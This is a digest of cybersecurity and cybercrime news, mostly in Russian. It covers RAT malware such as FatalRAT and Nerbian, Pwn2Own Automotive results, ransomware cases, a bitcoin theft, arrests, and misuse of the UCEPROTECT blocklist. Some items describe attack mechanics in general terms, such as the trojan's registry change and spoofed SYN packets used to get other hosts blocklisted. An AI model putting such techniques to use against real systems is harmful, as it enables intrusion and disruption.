Перед тем как полностью заразить систему, FatalRAT проводит ряд проверок: вредонос пытается вычислить виртуальную машину, посчитать число физических процессов и определить доступное место на диске.
Помимо этого, троян полностью отключает возможность использовать команду CTRL+ALT+DELETE, для чего меняется значение ключа реестра DisableLockWorkstation. После этого вредонос запускает кейлогер.
FatalRAT пытается определить, какие антивирусные программы запущены в атакованной системе, параллельно он вытаскивает информацию из браузеров. Более того, троян может распространяться по сети жертвы, применяя брутфорс.
• Source: <https://cybersecurity.att.com/blogs/labs-research/new- sophisticated-rat-in-town-fatalrat-analysis>
В Петербурге с киберпреступностью борется специальное подразделение ГУ МВД. В ходе своего выступления в городском Законодательном собрании руководитель ГУ МВД Роман Плугин рассказал, что новая структура МВД в городе работает уже месяц.
В подразделении заняты сотрудники полиции, специализирующиеся на расследовании преступлений в сфере информационных технологий. Уточняется, что за месяц они уже добились определенных успехов: киберпреступлений в городе стало меньше на 6%.
Самым значимым в Петербурге стало сокращение преступлений, связанных с использованием электронных средств платежа — их стало в полтора раза меньше. 153 миллиона рублей удалось вернуть тем, кто стал жертвами мошенников в банковской сфере.
source: fontanka.ru/2023/03/22/72153494
Токио заявило, что Москва, Пекин и Пхеньян являются его киберврагами.
На заседании японского Кабмина обсуждалась проблема киберугроз, а также меры по противодействию им, на нем Россия, Китай и КНДР были официально объявлены киберврагами Японии. Подробности передает японская проправительственная газета «Нихон кэйдзай симбун».
Японские чиновники разрабатывали стратегию противодействия трем странам, включая Россию. Правительство страны призывало представителей промышленности и бизнеса также включаться в борьбу с киберугрозами и укреплять IT-безопасность. Также было объявлено, что Токио вступает в кибервойну с Москвой, Пекином и Пхеньяном.
Никогда раньше КНР, Российская Федерация и Северная Корея не упоминались в официальных японских кругах как источники угроз в сфере киберпространства.
«Ситуация с безопасностью вокруг Японии становится все более суровой, а киберпространство стало местом конкуренции между странами, отражая геополитическую напряженность. Считается, что Китай, Россия и Северная Корея укрепляют свой потенциал в киберпространстве и проводят кибератаки, направленные на кражу информации. Китай в настоящее время активно похищает информацию у японских компаний, связанных с военно-промышленным сектором, и компаний с передовыми технологиями, а Россия осуществляет кибератаки для достижения военных и политических целей», — утверждается в правительственном докладе.
Для укрепления кибернетического потенциала Япония намерена тесно сотрудничать с участниками Четырехстороннего диалога по безопасности, в который также входят Австралия, Индия и США, отмечается в одобренной стратегии.
В Японии ежегодно фиксируется более 4 тыс. попыток незаконного проникновения в различные компьютерные сети и системы. В частности, жертвами злоумышленников в последние годы становились крупные электротехнические корпорации NEC и Mitsubishi Electric.
Напомним, хакеры получили доступ к информации о вакцине против коронавируса от Moderna Inc., которую компания-разработчик передала Европейскому агентству по лекарственным средствам.
Также Министерство цифровой трансформации собирается провести багбаунти для белых хакеров со всего мира, чтобы найти уязвимые места в государственном портале «Дія».
Ранее в США арестовали нескольких украинцев, обвиняемых в похищении массивов номеров платежных карт и других данных американского бизнеса.
source: nikkei.com/article/DGXZQOUA261ZY0W1A920C2000000
Федеральное управление уголовной полиции Германии (BKA) совместно с Генеральной прокуратурой Франкфурта-на-Майне провели масштабную операцию против предполагаемых членов онлайн-группировки «Новый мировой порядок» (New World Order, NWO). Во вторник утром правоохранительные органы провели обыски в десяти квартирах в шести регионах Германии: Баварии, Берлине, Бранденбурге, Баден-Вюртемберге, Гессене и Нижней Саксонии. В результате операции, проведенной в рамках борьбы с киберпреступностью, было изъято множество электронных устройств и носителей информации.
По данным BKA, подозреваемым инкриминируется участие в преступной организации, основной целью которой является совершение преступлений, таких как систематическое кибермошенничество и киберпреследование. В заявлении BKA отмечается, что речь идет не просто об отдельных правонарушениях, а о координированных действиях против жертв, что квалифицируется как участие в преступной группировке. Пресс-секретарь Центрального офиса по борьбе с интернет-преступностью при Генеральной прокуратуре Франкфурта Беньямин Краузе подчеркнул , что акция направлена на демонстрацию решимости властей противодействовать не только единичным преступлениям, но и систематическим преступным действиям в интернете.
Группировка «Новый мировой порядок» существует исключительно в виртуальном пространстве, представляя собой объединение лиц, действующих через интернет. Она координирует свои действия через закрытые чаты и другие онлайн-платформы, что позволяет ее членам организовывать и проводить преступные кампании против жертв, не имея физического контакта и скрывая свои личности.
В многочисленных случаях лидеры NWO выбирали в качестве жертв представителей онлайн-стримеров, которых в группировке называли «Маски». Часто жертвами становились наиболее уязвимые или когнитивно ограниченные люди. Эти люди подвергались преследованиям, угрозам и оскорблениям через социальные сети. Кроме того, члены группировки публиковали символику запрещенных организаций и разжигали ненависть в комментариях, стремясь унизить жертв и заставить их отказаться от своей онлайн-деятельности, что они называли «Masken-Games».
Члены NWO также занимались сбором и распространением персональных данных жертв, чтобы обнародовать их в ходе трансляций, что получило название «Doxing- Events». Для этого они использовали поддельные («спуфированные») номера телефонов и поддельные удостоверения личности, чтобы получить доступ к информации из публичных и непубличных баз данных, а также от властей.
Кроме того, в арсенале NWO присутствовали ложные вызовы экстренных служб, известные как «Swatting». Злоумышленники, представляясь вымышленными лицами, сообщали о вымышленных происшествиях, таких как пожары, утечки газа или насильственные преступления в домах жертв. Цель таких действий - спровоцировать вторжение спецподразделений полиции в жилище жертвы во время прямой трансляции.
• Source: https://www.bka[.]de/DE/Presse/Listenseite_Pressemitteilungen/2024/Presse2024/240903_PM_Ma%C3%9Fnahmen_NWO.html
• Source: https://www.bka[.]de/SharedDocs/Pressemitteilungen/DE/Presse_2024/pm240903_Ma%C3%9Fnahmen_NWO.pdf?__blob=publicationFile&v=4
• Source: [https://www.spiegel.de/netzwelt/web...wo-vor- a-b85b25b0-bc0d-4c02-ba90-8167b1669b0a](https://www.spiegel.de/netzwelt/web/internet- trolle-bundeskriminalamt-geht-deutschlandweit-gegen-nwo-vor- a-b85b25b0-bc0d-4c02-ba90-8167b1669b0a)
Исследователи безопасности взломали модем автомобиля Tesla и получили суммарную награду в размере 722 500 долларов в первый же день состязания Pwn2Own Automotive 2024, который сейчас проходит в Токио. Сегодня белыми хакерами было обнаружено, ни много ни мало, 24 уязвимости нулевого дня (zero- day).
Команда Synacktiv заработала $100 000, успешно объединив 3 уязвимости нулевого дня для получения root-доступа к модему автомобиля Tesla. Это позволило белым хакерам получить полный контроль над устройством и продемонстрировать возможность компрометации системы.
Кроме того, Synacktiv использовала две уникальные цепочки из двух уязвимостей для взлома зарядной станции Ubiquiti Connect EV и зарядки JuiceBox 40 Smart EV, заработав дополнительные $120 000. Эти атаки также продемонстрировали серьёзные проблемы безопасности в популярных моделях зарядных устройств для электромобилей.
Ещё одна цепочка эксплойтов, нацеленная на зарядку ChargePoint Home Flex EV, уже была известна, но всё равно принесла команде $16 000 наличными. В общей сложности в первый день конкурса хакеры из Synacktiv заполучили $295 000 призовых.
Исследователи безопасности также успешно взломали несколько полностью обновлённых зарядных станций для электромобилей и систем мультимедиа от других производителей. Так, команда NCC Group EDG заняла второе место в турнирной таблице, получив $70 000 за использование уязвимостей нулевого дня для взлома мультимедийной системы Pioneer DMH-WT7600NEX и зарядки Phoenix Contact CHARX SEC-3100 EV.
Результаты первого дня Pwn2Own демонстрируют, что даже современное программное обеспечение и оборудование в сфере электромобилей содержит серьёзные уязвимости, которые могут быть использованы злоумышленниками для атак. Тем не менее, в своевременном обнаружении таких уязвимостей нет ничего невозможного, нужно лишь собрать в одном месте десятки хакеров и поставить конкретную задачу.
После демонстрации эксплойтов в рамках конкурса Pwn2Own у производителей есть 90 дней на разработку и выпуск исправлений безопасности, прежде чем детали выявленных уязвимостей будут публично раскрыты в рамках Zero Day Initiative компании Trend Micro.
Такой подход даёт производителям достаточно времени, чтобы устранить уязвимости в своих продуктах, прежде чем этой информацией воспользуются злоумышленники, но держит их в достаточном тонусе, чтобы не растягивать выпуск исправлений на долгий срок.
Pwn2Own Automotive 2024 проходит на этой неделе в Токио в рамках конференции Automotive World. В ходе соревнования исследователи кибербезопасности будут атаковать различные автомобильные технологии, включая мультимедийные системы, операционные системы автомобилей, зарядные станции и т.д.
Главный приз — $200 000 и автомобиль Tesla Model 3 — будет присуждён за демонстрацию уязвимостей нулевого дня в системах VCSEC, шлюза или автопилота.
В прошлом году, во время конкурса Pwn2Own Vancouver 2023, исследователи кибербезопасности суммарно заработали $1 035 000 и автомобиль Tesla Model 3 после демонстрации 27 уязвимостей нулевого дня и нескольких дополнительных цепочек атак.
](https://www.zerodayinitiative.com/blog/2024/1/24/pwn2own- automotive-2024-day-one-results)
Welcome to the first ever Pwn2Own Automotive: live from Tokyo January 24-26, 2024! We’ll be updating this blog in real time as results become available. We have a full schedule of attempts today, so stay tuned! All times are Japan Standard Time (GMT +9:00).
 www.zerodayinitiative.com
Пользователь под ником 83_5BTC, с адреса которого 23 ноября была выплачена рекордная комиссия в $3,1 млн, заявил, что стал жертвой хакера.
__https://twitter.com/x/status/1727996658758058120
По его словам, злоумышленник украл у него более 139 BTC ($5,2 млн), включая транзакционные издержки в размере 83,65 BTC ($3,1 млн).
«Я создал новый холодный кошелек, перевел на него 139 BTC, и они сразу же были переведены на другой адрес. Могу предположить, что кто-то запускал скрипт на этом кошельке и что у скрипта был странный расчет комиссии», — сообщил пользователь.
В доказательство своих слов 83_5BTC подписал сообщение с указанного биткоин- адреса: «@83_5BTC является владельцем средств, уплативших высокую комиссию». Подпись была проверена Mononaut, разработчиком инструмента Mempool.
__https://twitter.com/x/status/1728946778798793126
«Подпись проверена, @83_5BTC, по-видимому, действительно контролирует ключ, с которого была уплачена комиссия в размере 83,7 BTC», — отметил он.
Соучредитель Casa и технический директор Джеймсон Лопп также подтвердил подпись.
__https://twitter.com/x/status/1728957651051299226
Тем не менее, поскольку кошелек скомпрометирован, данная подпись с высокой вероятностью могла быть создана хакером.
Член сообщества niftydev заявил, что знает человека, стоящего за учетной записью 83_5BTC, и он не злоумышленник.
__https://twitter.com/x/status/1728971001860624799
Представители AntPool, которые верифицировали транзакцию, не комментировали ситуацию.
По предположению Mononaut, наиболее вероятной причиной взлома являлась низкая энтропия кошелька жертвы, что и сделало его уязвимым.
В таком случае несколько злоумышленников могли бы конкурировать за кражу средств и повышать комиссию для того, чтобы ускорить вывод средств на свой адрес, добавил эксперт.
Mononaut также отметил, что уплаченная комиссия составила ровно 60% от общей суммы украденных 139,42 BTC, а потенциальный хакер дополнительно увел 0,001 BTC с того же адреса, заплатив 0,0006 BTC в качестве комиссии.
__https://twitter.com/x/status/1729045556662792283
«Это, в сочетании со скоростью кражи, кажется разумным доказательством использования автоматизированного скрипта со стороны атакующего», — объяснил он.
Напомним, 10 сентября инфраструктурная блокчейн-компания Рахоs по ошибке заплатила 19,82 BTC ($510 750) в качестве комиссии майнерам за перевод 0,074 BTC (~$1800).
Представители F2Pool сообщили, что после необходимых проверок вернули компании ее биткоины.
Житель штата Калифорния Ара Малхасян (Ara Malkhasyan) приговорен к шести годам и девяти месяцам тюрьмы за кражу более 1,7 миллиона долларов у крупных банков благодаря реализации схемы мошенничества с чеками. Журналисты KTLA утверждают что 52-летний этнический армянин был организатором и вдохновителем группировки, которая практически полностью состояла из его родственников.
Следствие выяснило, что с 2015-го по 2017 год Малхасян и его сообщники получали украденные армянские паспорта и меняли их, вклеивая свои фотографии. По этим документам они получали другие и, обзаведясь полными комплектами, открывали банковские счета. После этого Малхасян и его сообщники выписывали фальшивые чеки на другие подставные счета, с которых переводили средства уже себе. Обналичивание неизменно происходило в банкоматах в казино Лас-Вегаса.
Любопытно, что ключевыми сообщниками мошенника стали его 49-летняя сестра Света Хечумян (Sveta Khechumyan) и ее 41-летний муж Смбат Хечумян (Smbat Khechumyan). На их имена «открывались» также поддельные паспорта граждан Белоруссии и Украины. Смбата Хечумяна ранее уже приговорили к двухлетнему сроку, его жена ждет оглашения приговора.
Следственными органами отдела полиции № 2 УМВД России по г. Липецку завершено расследование уголовного дела по обвинению 25-летнего липчанина в совершении преступления, предусмотренного частью 2 статьи 273 УК РФ «Создание, использование и распространение вредоносных компьютерных программ».
В ходе предварительного расследования установлено, что фигурант на интернет- сайте бесплатных объявлений разместил информацию о продаже игровой консоли. Ранее он загрузил и установил на нее специальную программу прошивки, предназначенную для блокировки средств защиты и воспроизведения нелицензионной продукции. Указанную приставку злоумышленник продал за 7 тысяч рублей.
Свою вину в совершении противоправного деяния фигурант признал и раскаялся.
Согласно действующему законодательству максимальная санкция инкриминируемой статьи влечет наказание в виде лишения свободы на срок до пяти лет.
• Source: [https://48.мвд.рф/news/item/39748769/](https://48.xn--b1aew.xn-- p1ai/news/item/39748769/)
В мае 2021 года криптовалютная платформа Crypto.com случайно перевела женщине из Мельбурна $10,5 млн вместо возврата $100.
Ошибочную транзакцию обнаружили спустя более семи месяцев в результате аудита в конце года.
Платформа подала в суд для возврата средств. В ходе слушаний представитель Crypto.com пояснил ошибку с переводом тем, что в поле оплаты вместо суммы $100 сотрудник внес номер счета.
Однако до попытки компании вернуть средства получатель вместе с сестрой купила на них роскошный особняк со спортзалом и кинотеатром в пригороде Мельбурна.

Приобретенный женщинами особняк в Крейгиберне. Данные: Ticker News.
Судья постановил продать имущество и вернуть платформе оставшиеся деньги.
Напомним, в январе Crypto.com стала спонсором мужской и женской футбольных лиг Австралии. В компании отметили, что к сделке их привлекла заинтересованность австралиек в цифровых активах.
source: tickernews.co/crypto-com-accidentally-transfers-10-5m-to-woman- instead-of-100/
Специалисты из Proofpoint предупредили пользователей о появлении нового трояна удаленного доступа (RAT) под названием Nerbian. RAT написан на языке Go и нацелен на организации в Великобритании, Италии и Испании.
"Троян написан на языке программирования Go, не зависящем от ОС, скомпилирован для 64-битных систем и использует несколько процедур шифрования для обхода сетевого анализа", – пишут исследователи. RAT может регистрировать нажатия клавиш, запускать произвольные команды, делать скриншоты и передавать данные на удаленный C&C-сервер. Разработчик трояна пока неизвестен.
Nerbian распространяется с 26 апреля 2022 года через фишинговую рассылку с использованием поддельных писем на тему COVID-19. Количество таких писем не превышает 100, и они замаскированы под письма ВОЗ о мерах безопасности в условиях эпидемии. В письмах жертвам предлагается открыть документ Word с макросом, который в фоновом режиме запускает цепочку заражения.
Специалисты Proofpoint рассказали , что дроппером полезной нагрузки является UpdateUAV.exe – 64-битный исполняемый файл, размером 3,5 МБ и написанный на языке Golang. По данным исследователей, дроппер и вредоносное ПО были разработаны одним автором.
Исследователи Proofpoint заметили в Nerbian множество антианалитических компонентов, усложняющих обратный инжиниринг и проведение антиреверсивных проверок. Защитные компоненты также используются для самоликвидации трояна при обнаружении отладчиков или программ анализа памяти.
• Source: [https://www.proofpoint.com/us/blog/...mes-features-sophisticated- evasion-techniques](https://www.proofpoint.com/us/blog/threat-insight/nerbian- rat-using-covid-19-themes-features-sophisticated-evasion-techniques)
Следователем ГСУ ГУ МВД России по г. Москве завершено расследование уголовного дела, возбуждённого по признакам преступлений, предусмотренных ч. 3 ст. 272 Уголовного кодекса Российской Федерации «Неправомерный доступ к компьютерной информации» и ч. 3 ст. 183 Уголовного кодекса Российской Федерации «Незаконные получение и разглашение сведений, составляющих коммерческую, налоговую или банковскую тайну».
Следствием установлено, что фигурант уголовного дела, 35-летний житель столицы, являясь сотрудником одной известной IT-компании, посредством электронной почты получил заказ на осуществление неправомерного доступа к компьютерной информации с последующим её копированием.
После этого злоумышленник, используя служебную учётную запись и служебный электронный ключ, получил все необходимые ему сведения, которые впоследствии передал заказчику, получив за это денежные средства в размере 50 тысяч рублей.
В настоящее время уголовное дело с утверждённым обвинительным заключением направлено в Люблинский районный суд г. Москвы для рассмотрения по существу.
Обвиняемый находится под подпиской о невыезде и надлежащем поведении.
За совершение каждого из указанных преступлений мужчине грозит наказание в виде лишения свободы на срок до 5 лет.
3 августа, на сеть криптовалюты Bitcoin SV была совершена атака 51%. Как сообщают аналитики, реорганизации подверглись 14 блоков.
Изначально об атаке сообщил исследователь аналитической компании CoinMetrics Лукас Нуцци (Lucas Nuzzi) вечером 3 августа. По его словам, вчера около 11.45 утра в сети внезапно появилась «серьезная мощность хеширования».
Позже CoinMetrics подтвердила эту информацию и заявила, что ее инструмент мониторинга безопасности блокчейнов FARUM зафиксировал реорганизацию 14 блоков в сети Bitcoin SV. CoinMetrics отметила, что атака закончилась, но влияние на пулы майнинга все еще сохраняется. Как сообщил Нуцци, по состоянию на вечер 3 августа пулы добывали монеты на «совершенно разных» высотах блоков.
Атака 51% позволяет злоумышленнику получить частичный контроль над блокчейном. Она может использоваться для атаки двойной траты, причем вероятность успеха злоумышленника становится максимальной. Другая возможность атаки 51% – нарушение работы блокчейна через полную или частичную остановку подтверждения транзакций.
Суть атаки заключается в получении злоумышленником более 50% хэшрейта в блокчейнах, использующих PoW, или 50% монет в блокчейнах, использующих PoS. Чем больший процент контроля ему удастся получить, тем быстрее и успешнее будет атака. Имея преимущество над остальными майнерами или валидаторами, злоумышленник может создать альтернативную цепочку блоков и перезаписать некоторое количество последних блоков с нужными ему транзакциями.
Вечером 3 августа The Bitcoin Association рекомендовала операторам узлов помечать блоки цепочки злоумышленников как недействительные. Блокчейн Bitcoin SV, появившийся в результате хардфорка Bitcoin Cash, в июле подвергся четырем атакам. Пока не ясно, кто стоит за атакой. CoinMetrics изучает цепочку злоумышленников в поисках «следов двойных трат на биржах», – сказал Нуцци.
По его словам, основные майнинговые пулы Bitcoin SV все еще пытаются наладить работу и добывать блоки в одной цепочке. [По данным Bitinfocharts](https://bitinfocharts.com/comparison/bitcoin%20sv- hashrate.html), с понедельника по вторник хешрейт Bitcoin SV упал почти на 50%. Однако Нуцци считает, что это – следствие неразберихи после реорганизации блоков.
Операции кибершпионажа поддерживают долгосрочные цели экономического и военного развития Китая.
Власти США предупредили об активных действиях хакеров, поддерживаемых
правительством Китая, направленных на хищение интеллектуальной собственности и
секретов. АНБ, ФБР и киберподразделения Министерства внутренней безопасности
США сообщили, что китайские по-прежнему «агрессивно» нацелены на американские
и связанные с ними оборонные и полупроводниковые компании, медицинские
учреждения и университеты с целью украсть конфиденциальные корпоративные
данные и личную информацию.
Несмотря на повышенное внимание
администрации президента США Джо Байдена к базирующимся в России
вымогательским группировкам, хакерские атаки, поддерживаемые китайским
государством, остаются серьезной угрозой.
«Специалисты АНБ и ФБР отмечают все более изощренную спонсируемую Китаем
киберактивность, нацеленную на политические, экономические, военные и
образовательные организации критической инфраструктуры США. Эти кибероперации
поддерживают долгосрочные цели экономического и военного развития Китая», —
сообщил ресурс CyberScoop, в распоряжении которого оказался отчет ведомств.
Китай, в частности, является экономическим конкурентом США и, по мнению
аналитиков, использует свое хакерское мастерство для получения стратегического
преимущества. В 2015 году президент Барак Обама и президент Китая Си Цзиньпин
договорились, что ни одна из стран не будет «сознательно поддерживать кражу
интеллектуальной собственности с помощью киберпреступников». Хотя аналитики
спорят о том, придерживается ли Китай данного соглашения, есть свидетельства
того, что китайские правительственные хакеры продолжали воровать
конфиденциальные данные у транснациональных корпораций.
Эксплуатируемая уязвимость позволяла злоумышленникам получить доступ к устройствам с устаревшими версиями HBS 3.
Специалисты из компании QNAP рекомендуют своим клиентам обновить приложение аварийного восстановления HBS 3 с целью предотвращения атак программы- вымогателя Qlocker.
«Операторы Qlocker используют уязвимость ( CVE-2021-28799 ) в ходе атак на QNAP NAS с определенными версиями HBS 3 (Hybrid Backup Sync). Для предотвращения атак со стороны Qlocker мы рекомендуем обновить HBS 3 до последней версии», — пояснили эксперты.
Напомним, масштабная вредоносная кампания вымогателей Qlocker началась 19 апреля нынешнего года. Операторы вредоноса ежедневно атаковали сотни сетевых хранилищ (NAS) QNAP. Вымогатель упаковывал хранящиеся на устройствах файлы жертвы в защищенные паролем 7zip-архивы и требовал $550 за их восстановление. В настоящее время злоумышленники уже прекратили кампанию.
Хотя в то время вектор атаки не был известен, в QNAP теперь подтвердили, что злоумышленники эксплуатировали уязвимость (CVE-2021-28799), связанную со встроенными учетными данными. Уязвимость представляет собой бэкдор-аккаунт и позволяет злоумышленникам получить доступ к устройствам с устаревшими версиями HBS 3 (Hybrid Backup Sync).
Проблема была исправлена в следующих версиях HBS 3 (HBS 2 и HBS 1.3 не затронуты): QTS 4.5.2 (версии HBS 3 16.0.0415 и младше), QTS 4.3.6 (HBS 3 3.0.210412 и младше), QTS 4.3.3 и 4.3.4 (HBS 3 3.0.210411 и младше), QuTS hero h4.5.1 (HBS 3 16.0.0419 и младше), QuTScloud c4.5.1~c4.5.4 (HBS 3 16.0.0419 и младше).
Security researchers found malware embedded within the official application of APKPure, a popular third-party Android app store and an alternative to Google's official Play Store.
Android users use the application to install apps and games hosted on
APKPure's platform, supposedly identical to those available through the Play
Store.
The malware was discovered by
Kaspersky and
Dr.Web malware analysts
embedded within an advertisement SDK included with APKPure version 3.7.18.
As they discovered, it looks like a variant of the
Triada trojan
first spotted by Kaspersky in 2016 [[1](http://www.kaspersky.com/blog/triada-
trojan/11481/), [2](http://securelist.com/everyone-sees-not-what-they-want-to-
see/74997/)], capable of spamming users of infected devices with ads and
deliver additional malware.
"The identified malicious code embedded in APKPure operates in the following
way: upon launch of the application, the payload is decrypted and launched,"
Kaspersky said. "It then collects information about the user device and sends
it to the C&C server."
"Then, a Trojan is loaded that has much in common with the notorious Triada malware, in that it can perform a range of actions - from displaying and clicking ads to signing up for paid subscriptions and downloading other malware."
Next, depending on its operators' instructions and monetizing scheme (ads or pay-per-install), it will:
The damage inflicted by this trojan varies depending on the Android version running on the compromised devices, ranging from being signed up for paid subscriptions and seeing intrusive ads on current versions to having unremovable malware like xHelper deployed on the system partition.
Device
information collected by the malware(Kaspersky)
While no official download stats are available for the APKPure app, Kaspersky
says that it has so far blocked the malware on the devices of 9,380 Android
users running its security solutions on their devices.
Both Kaspersky and Dr.Web reported their findings to APKPure's developers, who have released APKPure 3.17.19 today without the malicious code.
Indicators of compromise, including APKpure app, payload, and malware sample hashes, are available at the end ofKaspersky's report.
Вчера компания CD Projekt Red сообщила, что стала жертвой шифровальщика, а вымогатели утверждали, что похитили исходные коды таких игр, как Cyberpunk 2077, The Witcher 3 (включая еще невышедшую версию с рейтрейсингом) и Gwent, а также финансовую, юридическую, административную и HR документацию.
CD Projekt Red писала, что не намерена вести переговоры с преступниками и платить им выкуп, понимая, что в конечном итоге скомпрометированные данные все равно могут быть раскрыты
Как потом сообщили ИБ-эксперты, включая Фабиана Восара из компании Emisoft, судя по опубликованной вымогательской записке, за этой атакой стоял относительно новый шифровальщик HelloKitty. Данная малварь активна с ноября 2020 года и нацелена на крупные компании, например, среди известных жертв числится бразильская энергетическая компания CEMIG.
__https://twitter.com/x/status/1359167108727332868
Другой ИБ-специалист, VX-Underground, пишет в Twitter, что злоумышленники уже выставили похищенные данные на аукцион. Стартовая цена «лота» с исходными кодами игр и другой украденной информацией составляет 1 000 000 долларов с шагом 500 000 долларов, а «блиц-цена» равна 7 000 000 долларов.
__https://twitter.com/x/status/1359473460448231425
Чтобы доказать подлинность украденных данных, продавец с ником redengine поделился текстовым файлом, содержащим список каталогов из предполагаемого исходного кода «Ведьмака 3». Также злоумышленники бесплатно опубликовали архив размером 21 Гб, который якобы содержит исходный код игры «Гвинт».

Аналитики ИБ-компании Kela пишут, что этот аукцион непохож на фальшивку, как минимум из-за упомянутого выше списка каталогов и желания хакеров использовать гаранта для проведения сделки.
Источник: xakep.ru/2021/02/10/cd-projekt-red-leak/
Серию кибератак на российские органы власти в 2020 году могли осуществить сразу несколько финансируемых правительством Китая хакерских группировок.
В новом отчете ИБ-компании Group-IB приводится подробный анализ использовавшегося в атаках вредоносного ПО Webdav-O. Согласно отчету, вредонос имеет много общего с популярным трояном BlueTraveller, связываемым с китайской киберпреступной группировкой TaskMasters и использующимся в кибершпионских операциях, целью которых является кража конфиденциальных документов.
По словам авторов отчета, китайские APT являются одними из самых многочисленных и агрессивных киберпреступных группировок в мире. Чаще всего они атакуют правительственные ведомства, промышленные предприятия, военных подрядчиков и исследовательские институты. Главной целью хакеров является шпионаж – злоумышленники получают доступ к конфиденциальным данным и пытаются скрыть свое присутствие в сетях жертвы как можно дольше.
Отчет Group-IB базируется на нескольких инцидентах, публично раскрытых в мае нынешнего года компаниями Solar JSOC и SentinelOne . Обе компании рассказали о вредоносном ПО Mail-O, использовавшемся в атаках на руководителей российских госорганов с целью получения доступа к их учетным записям в сервисах Mail.ru. SentinelOne связала данный вредонос с другим известным вредоносным ПО PhantomNet/SManager из арсенала группировки TA428.
В новом отчете описывается образец Webdav-O, загруженный на VirusTotal в ноябре 2019 года и имеющий много общего с образцом, описанным Solar JSOC. Однако представленная в отчете версия вредоноса является более новой, частично импровизированной, с новыми функциями. Этот вредонос таже имеет схожие черты с трояном BlueTraveller. В частности, много общего обнаружено в исходном коде и механизмах обработки команд обоих вредоносов.
Как показал подробный анализ наборов инструментов TA428, BlueTraveller имеет много общего с вредоносным ПО Albaniiutas, причисленным к арсеналу группировки в декабре 2020 года. Другими словами, и Albaniiutas, и Webdav-O представляют собой обновленные версии BlueTraveller.
«Примечательно, что китайские хакерские группы активно обмениваются инструментами и инфраструктурой, и, возможно, в данном случае все так и есть. Это означает, что один троян может быть настроен и модифицирован хакерами из разных группировок с разным уровнем подготовки и преследующими различные цели», - пояснили исследователи.
По словам специалистов, российские госорганы были атакованы в 2020 году либо двумя группировками, TA428 и TaskMasters, либо одной группой, объединяющей в себе несколько подразделений.
Как китайские группы TaskMasters и TA428 атакуют Россию
blog.group-ib.ru
SonicWall has released a second firmware update for an SMA-100 zero-day vulnerability known to be used in attacks and is warning to install it immediately.
Last month, SonicWall disclosed that their internal systems were attacked using a zero-day vulnerability in their SMA-100 remote access devices.
A week later, cybersecurity firm NCC Group discovered the zero-day
vulnerability used in this attack
On February 3rd, Sonicwall released a fix for the zero-day vulnerability and
strongly recommended all users install it.
Yesterday, SonicWall announced new firmware updates for SMA-100 series devices that provide additional safeguards discovered since their last update.
"Following up on the Feb. 3 firmware update outlined below, SonicWall is announcing the availability of new firmware versions for both 10.x and 9.x code on the SMA 100 series products, comprised of SMA 200, 210, 400, 410 physical appliances and the SMA 500v virtual appliance."
"SonicWall conducted additional reviews to further strengthen the code for the SMA 100 series product line," SonicWall announced in an update to their [SMA-100 security advisory](https://www.sonicwall.com/support/product- notification/additional-sma-100-series-10-x-and-9-x-firmware-updates-required- updated-feb-19-2-p-m-cst/210122173415410/).
While SonicWall does not describe what specific security fixes are in this update, they stress that all users should "IMMEDIATELY" upgrade their devices.
The changes in this new update are:
The new SMA 10.2 firmware includes:
The new 9.0 firmware includes:
These updates apply to the SMA 200, SMA 210, SMA 400, SMA 410 physical devices, and the SMA 500v (Azure, AWS, ESXi, HyperV) virtual appliances.
Owners can find instructions on how to apply the updates in [SonicWall's advisory](https://www.sonicwall.com/support/product-notification/additional- sma-100-series-10-x-and-9-x-firmware-updates-required-updated-feb-19-2-p-m- cst/210122173415410/).
Винсент Кэнфилд (Vincent Canfield), администратор почтового сервиса и хостинга-реселлера cock.li, обнаружил, что всю его IP-сеть автоматически внесли в список DNSBL UCEPROTECT за сканирование портов с соседних виртуальных машин. Подсеть Винсента попала в список Level 3, в котором блокировка осуществляется по номерам автономных систем и охватывает целые подсети, с которых многократно и для разных адресов срабатывали детекторы рассылки спама. В результате провайдер M247 отключил анонс одной из его сетей в BGP, фактически приостановив обслуживание.
Проблема заключается в том, что подставные серверы UCEPROTECT, которые притворяются открытыми релеями и фиксируют попытки отправки почты через себя, автоматически включают адреса в список блокировки на основе любой сетевой активности, без проверки установки сетевого соединения. Аналогичный метод помещения в список блокировки также применяется проектом Spamhaus.
Для попадания в список блокировки достаточно отправить один пакет TCP SYN, чем могут воспользоваться злоумышленники. В частности, так как двустороннего подтверждения TCP-соединения не требуется, можно при помощи спуфинга отправить пакет с указанием поддельного IP-адреса и инициировать попадание в список блокировки любого хоста. При симуляции активности с нескольких адресов можно добиться эскалации блокировки до уровней Level 2 и Level 3, которые выполняют блокировку по подсетям и номерам автономных систем.
Список Level 3 изначально был создан для борьбы с провайдерами, поощряющими вредоносную активность клиентов и не реагирующими на жалобы (например, хостинги, специально создаваемые для размещения нелегального контента или обслуживания спамеров). Несколько дней назад UCEPROTECT изменил правила попадания в списки Level 2 и Level 3, что привело к более агрессивной фильтрации и увеличению размера списков. Например, число записей в списке Level 3 выросло с 28 до 843 автономных систем.
Для противостояния UCEPROTECT была высказана идея использования при сканировании спуфинга адресов с указанием IP из диапазона спонсоров UCEPROTECT. В итоге UCEPROTECT внёс адреса своих спонсоров и многих других невиновных в свои базы, что создало [проблемы](https://blog.mxtoolbox.com/2021/02/12/recent-spikes-on-uce-protect- level-3/) с доставкой email. В том числе в список блокировки попала CDN-сеть компании Sucuri.
The FBI arrested a Texas man on Thursday for allegedly planning to "kill of about 70% of the internet" in a bomb attack targeting an Amazon Web Services (AWS) data center on Smith Switch Road in Ashburn, Virginia.
Seth Aaron Pendley, 28, was charged via criminal complaint on Friday morning for attempting to destroy a building using C-4 plastic explosives he tried to buy from an undercover FBI employee.
The FBI got wind of the suspect's plans in January when he revealed his plot
on the MyMilitia website using a 'Dionysus' handle, a forum used by militia
members and supporters to organize and communicate.
FBI agents found in late January from another source Pendley contacted using
the Signal encrypted messaging app that he was planning to use C-4 plastic
explosives to attack Amazon's data centers in an attempt to "kill off about
70% of the internet," according to the [criminal
complaint](https://www.documentcloud.org/documents/20612508-pendley-
bleepingcomputer-complaint) filed today.
In February, Pendley shared with the source a hand-made map of Amazon's Virginia-based AWS data center "featuring proposed routes of ingress and egress at the facility."
The same source introduced the suspect to an undercover FBI employee posing as an explosives supplier at the end of March.
Pendley told the "supplier" that he was planning to bomb servers he believed were used by the FBI, CIA, and other US federal agencies. His plot also included taking down the "oligarchy" currently leading the United States.

He met with the undercover FBI employee on April 8 to get what he believed were explosive devices. Instead, he received inert devices.
The suspect was arrested by FBI agents after placing them into his car,
following a demonstration from the "explosives supplier" on how to arm and
detonate them.

